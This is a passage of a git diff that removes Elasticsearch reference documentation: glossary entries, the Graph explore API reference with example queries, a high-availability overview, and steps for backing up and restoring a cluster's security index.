-be confused with document <>) which indicates the type
-of data that can be stored in that field, eg `integer`, `string`,
-`object`. The mapping also allows you to define (amongst other things)
-how the value for a field should be analyzed.
-
-[[glossary-filter]] filter ::
-// tag::filter-def[]
-A filter is a non-scoring <>,
-meaning that it does not score documents.
-It is only concerned with answering the question - "Does this document match?".
-The answer is always a simple, binary yes or no. This kind of query is said to be made
-in a {ref}/query-filter-context.html[filter context],
-hence it is called a filter. Filters are simple checks for set inclusion or exclusion.
-In most cases, the goal of filtering is to reduce the number of documents that have to be examined.
-// end::filter-def[]
-
-[[glossary-flush]] flush ::
-// tag::flush-def[]
-Perform a Lucene commit to write index updates in the transaction log (translog) to disk.
-Because a Lucene commit is a relatively expensive operation,
-{es} records index and delete operations in the translog and
-automatically flushes changes to disk in batches.
-To recover from a crash, operations that have been acknowledged but not yet committed
-can be replayed from the translog.
-Before upgrading, you can explicitly call the {ref}/indices-flush.html[Flush] API
-to ensure that all changes are committed to disk.
-// end::flush-def[]
-
-[[glossary-follower-index]] follower index ::
-// tag::follower-index-def[]
-The target index for <>. A follower index exists
-in a local cluster and replicates a <>.
-// end::follower-index-def[]
-
-[[glossary-force-merge]] force merge ::
-// tag::force-merge-def[]
-// tag::force-merge-def-short[]
-Manually trigger a merge to reduce the number of segments in each shard of an index
-and free up the space used by deleted documents.
-// end::force-merge-def-short[]
-You should not force merge indices that are actively being written to.
-Merging is normally performed automatically, but you can use force merge after
-<> to reduce the shards in the old index to a single segment.
-See the {ref}/indices-forcemerge.html[force merge API].
-// end::force-merge-def[]
-
-[[glossary-freeze]] freeze ::
-// tag::freeze-def[]
-// tag::freeze-def-short[]
-Make an index read-only and minimize its memory footprint.
-// end::freeze-def-short[]
-Frozen indices can be searched without incurring the overhead of re-opening a closed index,
-but searches are throttled and might be slower.
-You can freeze indices to reduce the overhead of keeping older indices searchable
-before you are ready to archive or delete them.
-See the {ref}/freeze-index-api.html[freeze API].
-// end::freeze-def[]
-
-[[glossary-frozen-index]] frozen index ::
-// tag::frozen-index-def[]
-An index reduced to a low overhead state that still enables occasional searches.
-Frozen indices use a memory-efficient shard implementation and throttle searches to conserve resources.
-Searching a frozen index is lower overhead than re-opening a closed index to enable searching.
-// end::frozen-index-def[]
-
-[[glossary-hidden-index]] hidden index ::
-// tag::hidden-index-def[]
-An index that is excluded by default when you access indices using a wildcard expression.
-You can specify the `expand_wildcards` parameter to include hidden indices.
-Note that hidden indices _are_ included if the wildcard expression starts with a dot, for example `.watcher-history*`.
-// end::hidden-index-def[] - -[[glossary-hot-phase]] hot phase :: -// tag::hot-phase-def[] -The first possible phase in the <>. -In the hot phase, an index is actively updated and queried. -// end::hot-phase-def[] - -[[glossary-hot-tier]] hot tier:: -// tag::hot-tier-def[] -A <> that contains nodes that handle the indexing load -for time series data such as logs or metrics and hold your most recent, -most-frequently-accessed data. -// end::hot-tier-def[] - -[[glossary-id]] id :: - -The ID of a <> identifies a document. The -`index/id` of a document must be unique. If no ID is provided, -then it will be auto-generated. (also see <>) - -[[glossary-index]] index :: -+ --- -// tag::index-def[] -// tag::index-def-short[] -An optimized collection of JSON documents. Each document is a collection of fields, -the key-value pairs that contain your data. -// end::index-def-short[] - -An index is a logical namespace which maps to one or more -<> and can have zero or more -<>. -// end::index-def[] --- - -[[glossary-index-alias]] index alias :: -+ --- -// tag::index-alias-def[] -// tag::index-alias-desc[] -An index alias is a secondary name -used to refer to one or more existing indices. - -Most {es} APIs accept an index alias -in place of an index name. -// end::index-alias-desc[] - -See {ref}/indices-add-alias.html[Add index alias]. -// end::index-alias-def[] --- - -[[glossary-index-lifecycle]] index lifecycle :: -// tag::index-lifecycle-def[] -The four phases an index can transition through: -<>, <>, -<>, and <>. -For more information, see {ref}/ilm-policy-definition.html[Index lifecycle]. -// end::index-lifecycle-def[] - -[[glossary-index-lifecycle-policy]] index lifecycle policy :: -// tag::index-lifecycle-policy-def[] -Specifies how an index moves between phases in the index lifecycle and -what actions to perform during each phase. -// end::index-lifecycle-policy-def[] - -[[glossary-index-pattern]] index pattern :: -// tag::index-pattern-def[] -A string that can contain the `*` wildcard to match multiple index names. -In most cases, the index parameter in an {es} request can be the name of a specific index, -a list of index names, or an index pattern. -For example, if you have the indices `datastream-000001`, `datastream-000002`, and `datastream-000003`, -to search across all three you could use the `datastream-*` index pattern. -// end::index-pattern-def[] - -[[glossary-index-template]] index template :: -+ --- -// tag::index-template-def[] -// tag::index-template-def-short[] -Defines settings and mappings to apply to new indexes that match a simple naming pattern, such as _logs-*_. -// end::index-template-def-short[] -An index template can also attach a lifecycle policy to the new index. -Index templates are used to automatically configure indices created during <>. -// end::index-template-def[] --- - -[[glossary-leader-index]] leader index :: -// tag::leader-index-def[] -The source index for <>. A leader index exists -on a remote cluster and is replicated to -<>. - -[[glossary-local-cluster]] local cluster :: -// tag::local-cluster-def[] -The cluster that pulls data from a <> in {ccs} or {ccr}. -// end::local-cluster-def[] - -[[glossary-mapping]] mapping :: - -A mapping is like a _schema definition_ in a relational database. Each -<> has a mapping, which defines a <>, -plus a number of index-wide settings. -+ -A mapping can either be defined explicitly, or it will be generated -automatically when a document is indexed. 
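-+
-For example, you can define a mapping explicitly when you create an index
-(a minimal sketch; the index and field names are illustrative):
-+
-[source,console]
---------------------------------------------------
-PUT /my-index-000001
-{
-  "mappings": {
-    "properties": {
-      "age":   { "type": "integer" },
-      "email": { "type": "keyword" },
-      "name":  { "type": "text" }
-    }
-  }
-}
---------------------------------------------------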
- -[[glossary-node]] node :: - -A node is a running instance of Elasticsearch which belongs to a -<>. Multiple nodes can be started on a single -server for testing purposes, but usually you should have one node per -server. -+ -At startup, a node will use unicast to discover an existing cluster with -the same cluster name and will try to join that cluster. - -[[glossary-primary-shard]] primary shard :: - -Each document is stored in a single primary <>. When -you index a document, it is indexed first on the primary shard, then -on all <> of the primary shard. -+ -By default, an <> has one primary shard. You can specify -more primary shards to scale the number of <> -that your index can handle. -+ -You cannot change the number of primary shards in an index, once the index is -created. However, an index can be split into a new index using the -<>. -+ -See also <> - -[[glossary-query]] query :: - -A request for information from {es}. You can think of a query as a question, -written in a way {es} understands. A search consists of one or more queries -combined. -+ -There are two types of queries: _scoring queries_ and _filters_. For more -information about query types, see <>. - -[[glossary-recovery]] recovery :: -+ --- -Shard recovery is the process -of syncing a <> -from a <>. -Upon completion, -the replica shard is available for search. - -// tag::recovery-triggers[] -Recovery automatically occurs -during the following processes: - -* Node startup or failure. - This type of recovery is called a *local store recovery*. -* <>. -* Relocation of a shard to a different node in the same cluster. -* {ref}/snapshots-restore-snapshot.html[Snapshot restoration]. -// end::recovery-triggers[] --- - -[[glossary-reindex]] reindex :: -+ --- -// tag::reindex-def[] -Copies documents from a _source_ to a _destination_. The source and -destination can be any pre-existing index, index alias, or -{ref}/data-streams.html[data stream]. - -You can reindex all documents from a source or select a subset of documents to -copy. You can also reindex to a destination in a remote cluster. - -A reindex is often performed to update mappings, change static index settings, -or upgrade {es} between incompatible versions. -// end::reindex-def[] --- - -[[glossary-remote-cluster]] remote cluster :: - -// tag::remote-cluster-def[] -A separate cluster, often in a different data center or locale, that contains indices that -can be replicated or searched by the <>. -The connection to a remote cluster is unidirectional. -// end::remote-cluster-def[] - -[[glossary-replica-shard]] replica shard :: - -Each <> can have zero or more -replicas. A replica is a copy of the primary shard, and has two -purposes: -+ -1. increase failover: a replica shard can be promoted to a primary -shard if the primary fails -2. increase performance: get and search requests can be handled by -primary or replica shards. -+ -By default, each primary shard has one replica, but the number of -replicas can be changed dynamically on an existing index. A replica -shard will never be started on the same node as its primary shard. - -[[glossary-rollover]] rollover :: -+ --- -// tag::rollover-def[] -// tag::rollover-def-short[] -Creates a new index for a rollover target when the existing index reaches a certain size, number of docs, or age. -A rollover target can be either an <> or a <>. -// end::rollover-def-short[] - -For example, if you're indexing log data, you might use rollover to create daily or weekly indices. 
-See the {ref}/indices-rollover-index.html[rollover index API]. -// end::rollover-def[] --- - -[[glossary-rollup]] rollup :: -// tag::rollup-def[] -Summarize high-granularity data into a more compressed format to -maintain access to historical data in a cost-effective way. -// end::rollup-def[] - -[[glossary-rollup-index]] rollup index :: -// tag::rollup-index-def[] -A special type of index for storing historical data at reduced granularity. -Documents are summarized and indexed into a rollup index by a <>. -// end::rollup-index-def[] - -[[glossary-rollup-job]] rollup job :: -// tag::rollup-job-def[] -A background task that runs continuously to summarize documents in an index and -index the summaries into a separate rollup index. -The job configuration controls what information is rolled up and how often. -// end::rollup-job-def[] - -[[glossary-routing]] routing :: - -When you index a document, it is stored on a single -<>. That shard is chosen by hashing -the `routing` value. By default, the `routing` value is derived from -the ID of the document or, if the document has a specified parent -document, from the ID of the parent document (to ensure that child and -parent documents are stored on the same shard). -+ -This value can be overridden by specifying a `routing` value at index -time, or a <> in the <>. - -[[glossary-searchable-snapshot]] searchable snapshot :: -// tag::searchable-snapshot-def[] -A <> of an index that has been mounted as a -<> and can be -searched as if it were a regular index. -// end::searchable-snapshot-def[] - -[[glossary-searchable-snapshot-index]] searchable snapshot index :: -// tag::searchable-snapshot-index-def[] -An <> whose data is stored in a <> that resides in a separate <> such as AWS S3. Searchable snapshot indices do not need -<> shards for resilience, since their data is -reliably stored outside the cluster. -// end::searchable-snapshot-index-def[] - -[[glossary-shard]] shard :: -+ --- -// tag::shard-def[] -A shard is a single Lucene instance. It is a low-level “worker” unit -which is managed automatically by Elasticsearch. An index is a logical -namespace which points to <> and -<> shards. -+ -Other than defining the number of primary and replica shards that an -index should have, you never need to refer to shards directly. -Instead, your code should deal only with an index. -+ -Elasticsearch distributes shards amongst all <> in the -<>, and can move shards automatically from one -node to another in the case of node failure, or the addition of new -nodes. -// end::shard-def[] --- - -[[glossary-shrink]] shrink :: -// tag::shrink-def[] -// tag::shrink-def-short[] -Reduce the number of primary shards in an index. -// end::shrink-def-short[] -You can shrink an index to reduce its overhead when the request volume drops. -For example, you might opt to shrink an index once it is no longer the write index. -See the {ref}/indices-shrink-index.html[shrink index API]. -// end::shrink-def[] - -[[glossary-snapshot]] snapshot :: -// tag::snapshot-def[] -Captures the state of the whole cluster or of particular indices or data -streams at a particular point in time. Snapshots provide a back up of a running -cluster, ensuring you can restore your data in the event of a failure. You can -also mount indices or datastreams from snapshots as read-only -{ref}/glossary.html#glossary-searchable-snapshot-index[searchable snapshots]. 
-// end::snapshot-def[] - -[[glossary-snapshot-lifecycle-policy]] snapshot lifecycle policy :: -// tag::snapshot-lifecycle-policy-def[] -Specifies how frequently to perform automatic backups of a cluster and -how long to retain the resulting snapshots. -// end::snapshot-lifecycle-policy-def[] - -[[glossary-snapshot-repository]] snapshot repository :: -// tag::snapshot-repository-def[] -Specifies where snapshots are to be stored. -Snapshots can be written to a shared filesystem or to a remote repository. -// end::snapshot-repository-def[] - -[[glossary-source_field]] source field :: - -By default, the JSON document that you index will be stored in the -`_source` field and will be returned by all get and search requests. -This allows you access to the original object directly from search -results, rather than requiring a second step to retrieve the object -from an ID. - -[[glossary-system-index]] system index :: -// tag::system-index-def[] -An index that contains configuration information or other data used internally by the system, -such as the `.security` index. -The name of a system index is always prefixed with a dot. -You should not directly access or modify system indices. -// end::system-index-def[] - -[[glossary-term]] term :: - -A term is an exact value that is indexed in Elasticsearch. The terms -`foo`, `Foo`, `FOO` are NOT equivalent. Terms (i.e. exact values) can -be searched for using _term_ queries. -+ -See also <> and <>. - -[[glossary-text]] text :: - -Text (or full text) is ordinary unstructured text, such as this -paragraph. By default, text will be <> into -<>, which is what is actually stored in the index. -+ -Text <> need to be analyzed at index time in order to -be searchable as full text, and keywords in full text queries must be -analyzed at search time to produce (and search for) the same terms -that were generated at index time. -+ -See also <> and <>. - -[[glossary-type]] type :: - -A type used to represent the _type_ of document, e.g. an `email`, a `user`, or a `tweet`. -Types are deprecated and are in the process of being removed. -See {ref}/removal-of-types.html[Removal of mapping types]. -// end::type-def[] - -[[glossary-warm-phase]] warm phase :: -// tag::warm-phase-def[] -The second possible phase in the <>. -In the warm phase, an index is generally optimized for search and no longer updated. -// end::warm-phase-def[] - -[[glossary-warm-tier]] warm tier:: -// tag::warm-tier-def[] -A <> that contains nodes that hold time series data -that is accessed less frequently and rarely needs to be updated. -// end::warm-tier-def[] diff --git a/docs/reference/graph/explore.asciidoc b/docs/reference/graph/explore.asciidoc deleted file mode 100644 index 204957ee6e1..00000000000 --- a/docs/reference/graph/explore.asciidoc +++ /dev/null @@ -1,424 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[graph-explore-api]] -== Graph explore API - -The Graph explore API enables you to extract and summarize information about -the documents and terms in your Elasticsearch index. - -The easiest way to understand the behaviour of this API is to use the -Graph UI to explore connections. You can view the most recent request submitted -to the `_explore` endpoint from the *Last request* panel. For more information, -see {kibana-ref}/graph-getting-started.html[Getting Started with Graph]. - -For additional information about working with the explore API, see the Graph -{kibana-ref}/graph-troubleshooting.html[Troubleshooting] and -{kibana-ref}/graph-limitations.html[Limitations] topics. 
-
-NOTE: The graph explore API is enabled by default. To disable access to the
-graph explore API and the Kibana {kibana-ref}/graph-getting-started.html[Graph
-UI], add `xpack.graph.enabled: false` to `elasticsearch.yml`.
-
-[discrete]
-=== Request
-
-`POST /_graph/explore`
-
-[discrete]
-=== Description
-
-An initial request to the `_explore` API contains a seed query that identifies
-the documents of interest and specifies the fields that define the vertices
-and connections you want to include in the graph. Subsequent `_explore` requests
-enable you to _spider out_ from one or more vertices of interest. You can exclude
-vertices that have already been returned.
-
-[discrete]
-=== Request Body
-
-[role="child_attributes"]
-====
-
-query::
-A seed query that identifies the documents of interest. Can be any valid
-Elasticsearch query. For example:
-+
-[source,js]
---------------------------------------------------
-"query": {
-  "bool": {
-    "must": {
-      "match": {
-        "query.raw": "midi"
-      }
-    },
-    "filter": [
-      {
-        "range": {
-          "query_time": {
-            "gte": "2015-10-01 00:00:00"
-          }
-        }
-      }
-    ]
-  }
-}
---------------------------------------------------
-
-
-vertices::
-Specifies one or more fields that contain the terms you want to include in the
-graph as vertices. For example:
-+
-[source,js]
---------------------------------------------------
-"vertices": [
-  {
-    "field": "product"
-  }
-]
---------------------------------------------------
-+
-.Properties for `vertices`
-[%collapsible%open]
-======
-field::: Identifies a field in the documents of interest.
-include::: Identifies the terms of interest that form the starting points
-from which you want to spider out. You do not have to specify a seed query
-if you specify an include clause. The include clause implicitly queries for
-documents that contain any of the listed terms.
-In addition to specifying a simple array of strings, you can also pass
-objects with `term` and `boost` values to boost matches on particular terms.
-exclude:::
-The `exclude` clause prevents the specified terms from being included in
-the results.
-size:::
-Specifies the maximum number of vertex terms returned for each
-field. Defaults to 5.
-min_doc_count:::
-Specifies how many documents must contain a pair of terms before it is
-considered to be a useful connection. This setting acts as a certainty
-threshold. Defaults to 3.
-shard_min_doc_count:::
-This advanced setting controls how many documents on a particular shard have
-to contain a pair of terms before the connection is returned for global
-consideration. Defaults to 2.
-======
-
-connections::
-Specifies one or more fields from which you want to extract terms that are
-associated with the specified vertices. For example:
-+
-[source,js]
---------------------------------------------------
-"connections": {
-  "vertices": [
-    {
-      "field": "query.raw"
-    }
-  ]
-}
---------------------------------------------------
-+
-NOTE: Connections can be nested inside the `connections` object to
-explore additional relationships in the data. Each level of nesting is
-considered a _hop_, and proximity within the graph is often described in
-terms of _hop depth_.
-+
-.Properties for `connections`
-[%collapsible%open]
-======
-query:::
-An optional _guiding query_ that constrains the Graph API as it
-explores connected terms. For example, you might want to direct the Graph
-API to ignore older data by specifying a query that identifies recent
-documents.
-vertices:::
-Contains the fields you are interested in.
For example: -+ -[source,js] --------------------------------------------------- -"vertices": [ - { - "field": "query.raw", - "size": 5, - "min_doc_count": 10, - "shard_min_doc_count": 3 - } -] --------------------------------------------------- -====== - -controls:: Direct the Graph API how to build the graph. -+ -.Properties for `controls` -[%collapsible%open] -====== -use_significance::: -The `use_significance` flag filters associated terms so only those that are -significantly associated with your query are included. For information about -the algorithm used to calculate significance, see the -{ref}/search-aggregations-bucket-significantterms-aggregation.html[significant_terms -aggregation]. Defaults to `true`. -sample_size::: -Each _hop_ considers a sample of the best-matching documents on each -shard. Using samples improves the speed of execution and keeps -exploration focused on meaningfully-connected terms. Very small values -(less than 50) might not provide sufficient weight-of-evidence to identify -significant connections between terms. Very large sample sizes can dilute -the quality of the results and increase execution times. -Defaults to 100 documents. -timeout::: -The length of time in milliseconds after which exploration will be halted -and the results gathered so far are returned. This timeout is honored on -a best-effort basis. Execution might overrun this timeout if, for example, -a long pause is encountered while FieldData is loaded for a field. -sample_diversity::: -To avoid the top-matching documents sample being dominated by a single -source of results, it is sometimes necessary to request diversity in -the sample. You can do this by selecting a single-value field and setting -a maximum number of documents per value for that field. For example: -+ -[source,js] --------------------------------------------------- -"sample_diversity": { - "field": "category.raw", - "max_docs_per_value": 500 -} --------------------------------------------------- -====== -==== - -// [discrete] -// === Authorization - -[discrete] -=== Examples - -[discrete] -[[basic-search]] -==== Basic exploration - -An initial search typically begins with a query to identify strongly related terms. - -[source,console] --------------------------------------------------- -POST clicklogs/_graph/explore -{ - "query": { <1> - "match": { - "query.raw": "midi" - } - }, - "vertices": [ <2> - { - "field": "product" - } - ], - "connections": { <3> - "vertices": [ - { - "field": "query.raw" - } - ] - } -} --------------------------------------------------- - -<1> Seed the exploration with a query. This example is searching -clicklogs for people who searched for the term "midi". -<2> Identify the vertices to include in the graph. This example is looking for -product codes that are significantly associated with searches for "midi". -<3> Find the connections. This example is looking for other search -terms that led people to click on the products that are associated with -searches for "midi". 
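-
-If you are calling the endpoint directly, for example from a shell script, the
-same request can be sent with curl. The following is only a sketch: it assumes
-an unsecured cluster listening on `localhost:9200` and reuses the `clicklogs`
-index from the example above.
-
-[source,sh]
---------------------------------------------------
-# Sketch only: send the basic exploration request shown above with curl.
-curl -X POST "localhost:9200/clicklogs/_graph/explore" -H 'Content-Type: application/json' -d'
-{
-  "query":       { "match": { "query.raw": "midi" } },
-  "vertices":    [ { "field": "product" } ],
-  "connections": { "vertices": [ { "field": "query.raw" } ] }
-}
-'
--------------------------------------------------- 
-// NOTCONSOLE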
- -The response from the explore API looks like this: - -[source,js] --------------------------------------------------- -{ - "took": 0, - "timed_out": false, - "failures": [], - "vertices": [ <1> - { - "field": "query.raw", - "term": "midi cable", - "weight": 0.08745858139552132, - "depth": 1 - }, - { - "field": "product", - "term": "8567446", - "weight": 0.13247784285434397, - "depth": 0 - }, - { - "field": "product", - "term": "1112375", - "weight": 0.018600718471158982, - "depth": 0 - }, - { - "field": "query.raw", - "term": "midi keyboard", - "weight": 0.04802242866755111, - "depth": 1 - } - ], - "connections": [ <2> - { - "source": 0, - "target": 1, - "weight": 0.04802242866755111, - "doc_count": 13 - }, - { - "source": 2, - "target": 3, - "weight": 0.08120623870976627, - "doc_count": 23 - } - ] -} --------------------------------------------------- -<1> An array of all of the vertices that were discovered. A vertex is an indexed -term, so the field and term value are provided. The `weight` attribute specifies -a significance score. The `depth` attribute specifies the hop-level at which -the term was first encountered. -<2> The connections between the vertices in the array. The `source` and `target` -properties are indexed into the vertices array and indicate which vertex term led -to the other as part of exploration. The `doc_count` value indicates how many -documents in the sample set contain this pairing of terms (this is -not a global count for all documents in the index). - -[discrete] -[[optional-controls]] -==== Optional controls - -The default settings are configured to remove noisy data and -get the "big picture" from your data. This example shows how to specify -additional parameters to influence how the graph is built. - -For tips on tuning the settings for more detailed forensic evaluation where -every document could be of interest, see the -{kibana-ref}/graph-troubleshooting.html[Troubleshooting] guide. - - -[source,console] --------------------------------------------------- -POST clicklogs/_graph/explore -{ - "query": { - "match": { - "query.raw": "midi" - } - }, - "controls": { - "use_significance": false, <1> - "sample_size": 2000, <2> - "timeout": 2000, <3> - "sample_diversity": { <4> - "field": "category.raw", - "max_docs_per_value": 500 - } - }, - "vertices": [ - { - "field": "product", - "size": 5, <5> - "min_doc_count": 10, <6> - "shard_min_doc_count": 3 <7> - } - ], - "connections": { - "query": { <8> - "bool": { - "filter": [ - { - "range": { - "query_time": { - "gte": "2015-10-01 00:00:00" - } - } - } - ] - } - }, - "vertices": [ - { - "field": "query.raw", - "size": 5, - "min_doc_count": 10, - "shard_min_doc_count": 3 - } - ] - } -} --------------------------------------------------- - -<1> Disable `use_significance` to include all associated terms, not just the -ones that are significantly associated with the query. -<2> Increase the sample size to consider a larger set of documents on -each shard. -<3> Limit how long a graph request runs before returning results. -<4> Ensure diversity in the sample by setting a limit on the number of documents -per value in a particular single-value field, such as a category field. -<5> Control the maximum number of vertex terms returned for each field. -<6> Set a certainty threshold that specifies how many documents have to contain -a pair of terms before we consider it to be a useful connection. 
-<7> Specify how many documents on a shard have to contain a pair of terms before
-the connection is returned for global consideration.
-<8> Restrict which documents are considered as you explore connected terms.
-
-
-[discrete]
-[[spider-search]]
-==== Spidering operations
-
-After an initial search, you typically want to select vertices of interest and
-see what additional vertices are connected. In graph-speak, this operation is
-referred to as "spidering". By submitting a series of requests, you can
-progressively build a graph of related information.
-
-To spider out, you need to specify two things:
-
- * The set of vertices for which you want to find additional connections.
- * The set of vertices you already know about that you want to exclude from the
-   results of the spidering operation.
-
-You specify this information using `include` and `exclude` clauses. For example,
-the following request starts with the product `1854873` and spiders
-out to find additional search terms associated with that product. The terms
-"midi", "midi keyboard", and "synth" are excluded from the results.
-
-[source,console]
---------------------------------------------------
-POST clicklogs/_graph/explore
-{
-  "vertices": [
-    {
-      "field": "product",
-      "include": [ "1854873" ] <1>
-    }
-  ],
-  "connections": {
-    "vertices": [
-      {
-        "field": "query.raw",
-        "exclude": [ <2>
-          "midi keyboard",
-          "midi",
-          "synth"
-        ]
-      }
-    ]
-  }
-}
--------------------------------------------------- 
-
-<1> The vertices you want to start from are specified
-as an array of terms in an `include` clause.
-<2> The `exclude` clause prevents terms you already know about from being
-included in the results.
diff --git a/docs/reference/gs-index.asciidoc b/docs/reference/gs-index.asciidoc
deleted file mode 100644
index 30beb16b0df..00000000000
--- a/docs/reference/gs-index.asciidoc
+++ /dev/null
@@ -1,6 +0,0 @@
-[[elasticsearch-reference]]
-= Elasticsearch Reference
-
-include::../Versions.asciidoc[]
-
-include::getting-started.asciidoc[]
diff --git a/docs/reference/high-availability.asciidoc b/docs/reference/high-availability.asciidoc
deleted file mode 100644
index 52bbc553dde..00000000000
--- a/docs/reference/high-availability.asciidoc
+++ /dev/null
@@ -1,32 +0,0 @@
-[[high-availability]]
-= Set up a cluster for high availability
-
-[partintro]
---
-Your data is important to you. Keeping it safe and available is important
-to {es}. Sometimes your cluster may experience hardware failure or a power
-loss. To help you plan for this, {es} offers a number of features
-to achieve high availability despite failures.
-
-* With proper planning, a cluster can be
-  <> to many of the
-  things that commonly go wrong, from the loss of a single node or network
-  connection right up to a zone-wide outage such as power loss.
-
-* You can use <> to replicate data to a remote _follower_
-  cluster which may be in a different data centre or even on a different
-  continent from the leader cluster. The follower cluster acts as a hot
-  standby, ready for you to fail over in the event of a disaster so severe that
-  the leader cluster fails. The follower cluster can also act as a geo-replica
-  to serve searches from nearby clients.
-
-* The last line of defence against data loss is to take
-  <> of your cluster so that you can restore
-  a completely fresh copy of it elsewhere if needed.
--- - -include::high-availability/cluster-design.asciidoc[] - -include::high-availability/backup-cluster.asciidoc[] - -include::ccr/index.asciidoc[] diff --git a/docs/reference/high-availability/backup-and-restore-security-config.asciidoc b/docs/reference/high-availability/backup-and-restore-security-config.asciidoc deleted file mode 100644 index 47fa196d2cb..00000000000 --- a/docs/reference/high-availability/backup-and-restore-security-config.asciidoc +++ /dev/null @@ -1,276 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[security-backup]] -=== Back up a cluster's security configuration -++++ -Back up the security configuration -++++ - -Security configuration information resides in two places: -<> and -<>. - -[discrete] -[[backup-security-file-based-configuration]] -==== Back up file-based security configuration - -{es} {security-features} are configured using the <> inside the `elasticsearch.yml` and -`elasticsearch.keystore` files. In addition there are several other -<> inside the same `ES_PATH_CONF` -directory. These files define roles and role mappings and configure the -<>. Some of the -settings specify file paths to security-sensitive data, such as TLS keys and -certificates for the HTTP client and inter-node communication and private key files for -<>, <> and the -<> realms. All these are also stored inside -`ES_PATH_CONF`; the path settings are relative. - -IMPORTANT: The `elasticsearch.keystore`, TLS keys and SAML, OIDC, and Kerberos -realms private key files require confidentiality. This is crucial when files -are copied to the backup location, as this increases the surface for malicious -snooping. - -To back up all this configuration you can use a <>, as described in the previous section. - -[NOTE] -==== - -* File backups must run on every cluster node. -* File backups will store non-security configuration as well. Backing-up -only {security-features} configuration is not supported. A backup is a -point in time record of state of the complete configuration. - -==== - -[discrete] -[[backup-security-index-configuration]] -==== Back up index-based security configuration - -{es} {security-features} store system configuration data inside a -dedicated index. This index is named `.security-6` in the {es} 6.x versions and -`.security-7` in the 7.x releases. The `.security` alias always points to the -appropriate index. This index contains the data which is not available in -configuration files and *cannot* be reliably backed up using standard -filesystem tools. This data describes: - -* the definition of users in the native realm (including hashed passwords) -* role definitions (defined via the <>) -* role mappings (defined via the - <>) -* application privileges -* API keys - -The `.security` index thus contains resources and definitions in addition to -configuration information. All of that information is required in a complete -{security-features} backup. - -Use the <> to backup -`.security`, as you would for any <>. -For convenience, here are the complete steps: - -. Create a repository that you can use to backup the `.security` index. -It is preferable to have a <> for -this special index. If you wish, you can also snapshot the system indices for other {stack} components to this repository. 
-+ --- -[source,console] ------------------------------------ -PUT /_snapshot/my_backup -{ - "type": "fs", - "settings": { - "location": "my_backup_location" - } -} ------------------------------------ - -The user calling this API must have the elevated `manage` cluster privilege to -prevent non-administrators exfiltrating data. - --- - -. Create a user and assign it only the built-in `snapshot_user` role. -+ --- -The following example creates a new user `snapshot_user` in the -<>, but it is not important which -realm the user is a member of: - -[source,console] --------------------------------------------------- -POST /_security/user/snapshot_user -{ - "password" : "secret", - "roles" : [ "snapshot_user" ] -} --------------------------------------------------- -// TEST[skip:security is not enabled in this fixture] - --- - -. Create incremental snapshots authorized as `snapshot_user`. -+ --- -The following example shows how to use the create snapshot API to backup -the `.security` index to the `my_backup` repository: - -[source,console] --------------------------------------------------- -PUT /_snapshot/my_backup/snapshot_1 -{ - "indices": ".security", - "include_global_state": true <1> -} --------------------------------------------------- -// TEST[continued] - -<1> This parameter value captures all the persistent settings stored in the -global cluster metadata as well as other configurations such as aliases and -stored scripts. Note that this includes non-security configuration and that it complements but does not replace the -<>. - --- - -IMPORTANT: The index format is only compatible within a single major version, -and cannot be restored onto a version earlier than the version from which it -originated. For example, you can restore a security snapshot from 6.6.0 into a -6.7.0 cluster, but you cannot restore it to a cluster running {es} 6.5.0 or 7.0.0. - -[discrete] -[[backup-security-repos]] -===== Controlling access to the backup repository - -The snapshot of the security index will typically contain sensitive data such -as user names and password hashes. Because passwords are stored using -<>, the disclosure of a snapshot would -not automatically enable a third party to authenticate as one of your users or -use API keys. However, it would disclose confidential information. - -It is also important that you protect the integrity of these backups in case -you ever need to restore them. If a third party is able to modify the stored -backups, they may be able to install a back door that would grant access if the -snapshot is loaded into an {es} cluster. - -We recommend that you: - -* Snapshot the `.security` index in a dedicated repository, where read and write -access is strictly restricted and audited. -* If there are indications that the snapshot has been read, change the passwords -of the users in the native realm and revoke API keys. -* If there are indications that the snapshot has been tampered with, do not -restore it. There is currently no option for the restore process to detect -malicious tampering. - -[[restore-security-configuration]] -=== Restore a cluster's security configuration -++++ -Restore the security configuration -++++ - -NOTE: You can restore a snapshot of the `.security` index only if it was -created in a previous minor version in the same major version. The last minor -version of every major release can convert and read formats of the index for -both its major version and the next one. 
- -When you restore security configuration you have the option of doing a complete -restore of *all* configurations, including non-security ones, or to only restore -the contents of the `.security` index. As described in -<>, the second option comprises only -resource-type configurations. The first option has the advantage of restoring -a cluster to a clearly defined state from a past point in time. The second option -touches only security configuration resources, but it does not completely restore -the {security-features}. - -To restore your security configuration from a backup, first make sure that the -repository holding `.security` snapshots is installed: - -[source,console] --------------------------------------------------- -GET /_snapshot/my_backup --------------------------------------------------- -// TEST[continued] - -[source,console] --------------------------------------------------- -GET /_snapshot/my_backup/snapshot_1 --------------------------------------------------- -// TEST[continued] - -Then log into one of the node hosts, navigate to {es} installation directory, -and follow these steps: - -. Add a new user with the `superuser` built-in role to the -<>. -+ --- -For example, create a user named `restore_user`: -[source,shell] --------------------------------------------------- -bin/elasticsearch-users useradd restore_user -p password -r superuser --------------------------------------------------- --- - -. Using the previously created user, delete the existing `.security-6` or -`.security-7` index. -+ --- -[source,shell] --------------------------------------------------- -curl -u restore_user -X DELETE "localhost:9200/.security-*" --------------------------------------------------- -// NOTCONSOLE - -WARNING: After this step any authentication that relies on the `.security` -index will not work. This means that all API calls that authenticate with -native or reserved users will fail, as will any user that relies on a native role. -The file realm user we created in the step above will continue to work -because it is not stored in the `.security` index and uses the built-in -`superuser` role. - --- - -. Using the same user, restore the `.security` index from the snapshot. -+ --- -[source,shell] --------------------------------------------------- - curl -u restore_user -X POST "localhost:9200/_snapshot/my_backup/snapshot_1/_restore" -H 'Content-Type: application/json' -d' - { - "indices": ".security-*", - "include_global_state": true <1> - } - ' --------------------------------------------------- -// NOTCONSOLE - -<1> The `include_global_state: true` is mandatory only for a complete restore. -This will restore the global cluster metadata, which contains configuration -information for the complete cluster. If you set this to `false`, it recovers -only the contents of the `.security` index, such as usernames and password -hashes, API keys, application privileges, role and role mapping definitions. --- - -. Optionally, if you need to review and override the settings that were included -in the snapshot (by the `include_global_state` flag), cherry-pick and -<> that you -<> with the -`GET _cluster/settings` API. - -. If you pursue a complete point in time restore of the cluster, you also have -to restore configuration files. Again, this will restore non-security settings as -well. -+ --- -This entails a straight-up filesystem copy of the backed up configuration files, -overwriting the contents of `$ES_PATH_CONF`, and restarting the node. This -needs to be done on *every node*. 
Depending on the extent of the differences
-between your current cluster configuration and the restored configuration, you
